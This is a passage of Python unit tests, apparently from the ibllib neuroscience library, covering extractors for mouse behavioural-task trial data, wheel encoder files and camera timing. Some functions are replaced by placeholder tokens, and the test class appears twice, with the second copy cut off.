len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n\n def test_get_feedbackType(self):\n ft = training_trials.FeedbackType(self.training_lt5['path']).extract()[\n 0]\n self.assertEqual(ft.size, self.training_lt5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = training_trials.FeedbackType(self.training_ge5['path']).extract()[\n 0]\n self.assertEqual(ft.size, self.training_ge5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = biased_trials.FeedbackType(self.biased_lt5['path']).extract()[0]\n self.assertEqual(ft.size, self.biased_lt5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = 
biased_trials.FeedbackType(self.biased_ge5['path']).extract()[0]\n self.assertEqual(ft.size, self.biased_ge5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n\n def test_get_contrastLR(self):\n cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n\n def test_get_probabilityLeft(self):\n pl = training_trials.ProbabilityLeft(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = training_trials.ProbabilityLeft(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = biased_trials.ProbabilityLeft(self.biased_lt5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_lt5['path'])\n if md:\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n pl = biased_trials.ProbabilityLeft(self.biased_ge5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_ge5['path'])\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n\n def test_get_choice(self):\n choice = training_trials.Choice(session_path=self.training_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = training_trials.Choice(session_path=self.training_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n trial_nogo = 
np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n\n def test_get_repNum(self):\n rn = training_trials.RepNum(self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rn, np.ndarray))\n for i in range(3):\n self.assertTrue(i in rn)\n rn = training_trials.RepNum(self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rn, np.ndarray))\n for i in range(4):\n self.assertTrue(i in rn)\n\n def test_get_rewardVolume(self):\n rv = training_trials.RewardVolume(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = training_trials.RewardVolume(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = biased_trials.RewardVolume(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n rv = biased_trials.RewardVolume(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n\n def test_get_feedback_times_ge5(self):\n ft = training_trials.FeedbackTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n\n def test_get_stimOn_times_lt5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_stimOnOffFreeze_times(self):\n st = training_trials.StimOnOffFreezeTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = 
biased_trials.StimOnOffFreezeTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = training_trials.StimOnOffFreezeTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n <function token>\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n\n def test_get_goCueTrigger_times(self):\n data = raw.load_data(self.training_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = training_trials.GoCueTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = biased_trials.GoCueTriggerTimes(self.biased_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n\n def test_get_goCueOnset_times(self):\n gcot = training_trials.GoCueTimes(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertTrue(np.all(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = training_trials.GoCueTimes(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 12)\n gcot = biased_trials.GoCueTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = biased_trials.GoCueTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 8)\n\n def test_get_included_trials_lt5(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials_ge5(self):\n it = training_trials.IncludedTrials(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = training_trials.IncludedTrials(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract(\n 
settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files = biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n\n def test_encoder_positions_clock_errors(self):\n path = self.biased_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n path = self.biased_ge5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_ge5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n\n def test_wheel_folders(self):\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderPositions*.raw*.ssv'\n ):\n df = raw._load_encoder_positions_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderPositions*.raw*.ssv'\n ):\n df = raw._load_encoder_positions_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n\n def test_load_encoder_positions(self):\n raw.load_encoder_positions(self.training_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_positions(self.training_ge5['path'])\n raw.load_encoder_positions(self.biased_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_positions(self.biased_ge5['path'])\n\n def test_load_encoder_events(self):\n raw.load_encoder_events(self.training_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_events(self.training_ge5['path'])\n raw.load_encoder_events(self.biased_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n 
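# NOTE (editor sketch): passing settings={'IBLRIG_VERSION_TAG': '4.9.9'}\n        # appears to force the legacy (<5.0) parser; without it the loader reads\n        # the session's own settings file and dispatches to the ge5 parser.\n        # Inferred from the lt5/ge5 fixture pattern above, not from ibllib docs.\n        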
raw.load_encoder_events(self.biased_ge5['path'])\n\n def test_size_outputs(self):\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n mock_data = {'intervals': np.array([[0, 1]]), 'peakAmplitude': np.\n array([1, 1]), 'peakVelocity_times': np.array([1, 1])}\n function_name = (\n 'ibllib.io.extractors.training_wheel.extract_wheel_moves')\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 
'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, 
tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n\n def test_get_feedbackType(self):\n ft = training_trials.FeedbackType(self.training_lt5['path']).extract()[\n 0]\n self.assertEqual(ft.size, self.training_lt5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = training_trials.FeedbackType(self.training_ge5['path']).extract()[\n 0]\n self.assertEqual(ft.size, self.training_ge5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = biased_trials.FeedbackType(self.biased_lt5['path']).extract()[0]\n self.assertEqual(ft.size, self.biased_lt5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = biased_trials.FeedbackType(self.biased_ge5['path']).extract()[0]\n self.assertEqual(ft.size, self.biased_ge5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n\n def test_get_contrastLR(self):\n cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n 
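# Invariant under test (same for all four fixtures): contrasts are\n        # non-negative and exactly one of (cl, cr) is NaN per trial -- the two\n        # NaN-count asserts below together force exactly one NaN per row,\n        # i.e. the signed contrast is split into disjoint left/right columns.\n        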
self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n\n def test_get_probabilityLeft(self):\n pl = training_trials.ProbabilityLeft(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = training_trials.ProbabilityLeft(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = biased_trials.ProbabilityLeft(self.biased_lt5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_lt5['path'])\n if md:\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n pl = biased_trials.ProbabilityLeft(self.biased_ge5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_ge5['path'])\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n\n def test_get_choice(self):\n choice = training_trials.Choice(session_path=self.training_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = training_trials.Choice(session_path=self.training_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 